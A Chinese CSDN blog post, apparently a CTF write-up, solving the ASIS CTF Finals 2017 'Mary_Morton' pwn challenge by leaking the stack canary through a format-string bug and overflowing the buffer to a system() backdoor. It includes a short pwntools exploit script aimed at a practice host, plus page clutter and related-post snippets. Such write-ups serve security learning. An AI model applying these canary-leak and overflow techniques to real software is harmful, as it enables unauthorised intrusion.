ASIS-CTF-Finals-2017 Mary_Morton

最新推荐文章于 2023-09-26 19:26:30 发布
最新推荐文章于 2023-09-26 19:26:30 发布
阅读量1.2k 收藏
点赞数 1
分类专栏: 栈溢出 堆溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41071646/article/details/86317159
版权

讲道理 这个 其实 感觉有两个方法 

两种方法 都要调用一下    第一个  printf函数     

第一个是 我们第一个可以    用printf  然后hook掉got的printf  不知道好不好实现  自己搜索了 资料 也没有发现 

第二个 就是观察栈了  。。。。。。。

这里有个保护  

就是 

readfsqword  在 ida 的f5看的不是很清楚 我们 看 汇编窗口的代码 

只有 rax 和fs:28h 两个值相等的时候   顺利的返回值  要不然  会调用 另一个 函数 

那么 我们那个 比较值 又在 溢出点上面  这就肯定不能随便输入了     可以 把这个原本的值 找出来   然后写回去  

这里  我们看看 2那个函数 

看的出来  他也有这个 readfsqword 这个函数   那么 我们经过调试 发现  

那个点 在   2那里 是  23*8 的地方(相对输入 )  在1的地方是  17*8 的地方   

然后  本来我还以为 他们这个是定值 后来我发现 这个只是一个地址    地址 是随机的  

那么 这个 printf  就可以利用一下  把  我们的   那个 地址 打印出来   然后就可以   把这个利用了

那么可以写出exp

from pwn import*
from time import*
io=remote('111.198.29.45','30114')
system_addr=p64(0x4008de)
io.sendlineafter('3. Exit the battle \n','2')
#io.recv()
io.sendline('%23$p')
sleep(0.3)
io.recvuntil('0x')
ss=io.recv(16)
pp=int(ss,16)
pp=p64(pp)
io.sendline('1')
p='a'*17*8+pp+'a'*8+system_addr
io.sendline(p)
print io.recv()
print io.recv()
print io.recv()

得出flag

pipixia233333
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
ASIS Certified Protection Professional(ASIS-CPP)认证考试题库.docx
07-05
ASIS Certified Protection Professional(ASIS-CPP)认证考试题库
ASIS-CTF-Finals-2017 pwn Mary_Morton Writeup
qq_39596232的博客
09-03 601
题目描述: ASIS-CTF-Finals-2017 非常简单的热身pwn 分析思路: 1、首先查看文件的安全信息: tucker@ubuntu:~/xman/pwn$ file Mary_Morton Mary_Morton: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interp...
ASIS-CTF-Finals-2017-Handicraft_RSA
MangoFengC++
03-29 846
题目 下载得到一个附件 f5346507773f4b909479387d59a01710 用Notepad++打开看看 ?zXZ 嬷碏 ! t/澹?j] 4J 鹘?d(/脘R?.窗(3幐U嶴D慗∑r嘔c縹谮}厍DZワk'磰~傊[杢?铹秄掑醾祖倻R{]`糷*2誻]~?Ъ师宼臬!?釼8Vi(船k~櫘?^霏蛽伸O蚬6ο 輐j/恵1瑅?? 搥?m溣/?簂[%秫蕮Iv?鸡v7卽?噽e逸弓:殮簎樍畉洅b蘕*嗹゜?ZYSf繜烰 !嚣飔痍燬藈N) H??{?h?x襸M櫚
XCTF-攻防世界CTF平台-PWN类——1、Mary_Morton(格式化字符串漏洞、缓冲区溢出漏洞)
Onlyone_1314的博客
09-09 1318
目录标题一级目录二级目录1、查看程序基本信息2、反编译程序3、攻击思路(1)先利用功能2格式化字符串漏洞(2)找到功能1的sub_400960()函数返回地址的位置方法二 一级目录 二级目录 1、查看程序基本信息 Mary_Morton程序,先用file查看: Linux下64位的ELF文件 再用checksec查看 程序开启了Partial RELRO、NX和Canary,没有PIE。程序开启了canary,就不能直接利用栈溢出覆盖返回地址了。因为在初始化一个栈帧时在栈底(stack overflow
攻防世界MISC-WDCTF-finals-2017--2-1
weixin_54067793的博客
09-06 638
下载打开之后发现文件损坏 用010分析 修改文件头 89 50 4E 47 修改完之后发现还是不能打开,查看文件宽度为0,随意修改后显示出很多小点,宽高度比例不正确,上脚本: cmd上命令:python crc.py 用010修改宽度改为:00 00 02 C5,高度不变:00 00 02 F8 图片出答案 flag iswdflag{Png_C2c_u_kn0W} ...
PWN做题笔记11-Mary_Morton(格式化字符串暴露canary)
qq_40923256的博客
05-15 303
Mary_Morton,知识点是格式化字符串漏洞暴露canary
H20asis-项目开发
03-30
在“H20asis-项目开发”中,我们聚焦于一个创新的非接触式饮水机设计,旨在确保用户在饮水时的安全与卫生。这个项目的核心是利用先进的技术来改进传统的饮水设备,使其更加人性化和适应现代健康需求。下面将详细讨论...
Asis - Sobrevivir es un juego-开源
04-27
Asis-Survive是一款出色的后世界末日RPG游戏。 您的脑海和屏幕上的魔法和剑的世界...
ASIS for GNAT-开源
05-15
ASIS 本身是 ISO / IEC 15291:1999 国际标准,确保了不同实现之间的兼容性,使得开发者可以编写一次工具,然后在遵循 ASIS 标准的不同 Ada 编译器上运行。这一标准的制定,极大地促进了 Ada 开发环境的生态系统发展...
ctf-writeups:CTF撰写
05-17
准备Docker容器为了毫无问题地运行挑战POC,我为各种Ubuntu版本准备了docker容器。 有关使用容器的说明,请参见。...32 NX Partial RELRO ASLR ret2libc stack overflow CTFtime Writeups档案ASIS
ctf-misc PNG(文件头IHEDR)图片隐写
热门推荐
persist213的博客
02-26 3万+
爆破crc校验所需要了解到的PNG文件头知识- (固定)八个字节89 50 4E 47 0D 0A 1A 0A为png的文件头 - (固定)四个字节00 00 00 0D(即为十进制的13)代表数据块的长度为13 - (固定)四个字节49 48 44 52(即为ASCII码的IHDR)是文件头数据块的标示(IDCH) - (可变)13位数据块(IHDR) - 前四个字节代表该图片的宽 ...
攻防世界pwn--Mary_Morton
YANG12345_6的博客
11-16 2213
攻防世界pwn–Mary_Morton file 一下,查看文件属性 checksec一下,查看保护措施 开了canary,在调用函数的时候会在栈上设置一个标志,标志的位置: EIP EBP canary logol ··· 栈的其他内容 开了NX,栈不可执行。 运行一下 ida查看其反汇编代码 在ida里看到有system函数: 地址:0x4008DA gdb调试,查看格式化字符串参数的位置 第六个位置 查看有关栈溢出的函数: 可以利用的栈溢出的buf的位置:rbp
asisctf 2023 web hello wp
Jay17的博客
09-26 454
asisctf 2023 web hello wp
Mary_MortonASIS-CTF-Finals-2017)--writeup
ATFWUS的博客
03-03 485
文件下载地址: 链接:https://pan.baidu.com/s/1on3lMupdI7YfPkQj7AmzEw 提取码:amqq 0x01.分析 checksec: 64位程序,开启了Canary,NX。 对源码得简单分析发现,程序提供了两个漏洞,格式化字符串漏洞和栈溢出,并且发现了程序得后门: 但是开启了cannary,我们无法直接覆盖返回地址,所以,我们必须利用格式...
从格式化字符串泄露canary到栈溢出
SsMing的博客
01-11 4277
ASIS-CTF-Finals-2017 Mary_Morton为例 checksec查看,开了NX保护,还有canary IDA打开 void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { const char *v3; // rdi int v4; // [rsp+24h] [rbp-Ch] ...
Asis CTF 2016 b00ks
Bill
04-01 2797
Asis CTF 2016 b00ks 1. 序言   本篇文章是对CTF WIKI Off-By-One漏洞类型的补充. CTF WIKI上面Off-By-One这一章节中两个例子均没有给出相应的EXP, 本次总结将其中一个例子详细分析一下, 希望能够对其他学习者有帮助 2. 程序简介 该程序是一个图书管理系统,可以添加书名,修改作者名以及写备注...
攻防世界pwn高手进阶(持续更新)
qq_42988973的博客
12-16 511
攻防世界pwn高手进阶wp
ASIS+Quals
最新发布
10-18
ASIS是Ada语义接口规范,它是已发布的国际ISO标准(ISO / IEC 15291:1999)。它提供了一种机制,使得可以在Ada程序中访问和操作程序的语法和语义信息。ASIS可以用于许多应用程序,例如代码分析、代码转换、代码生成...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值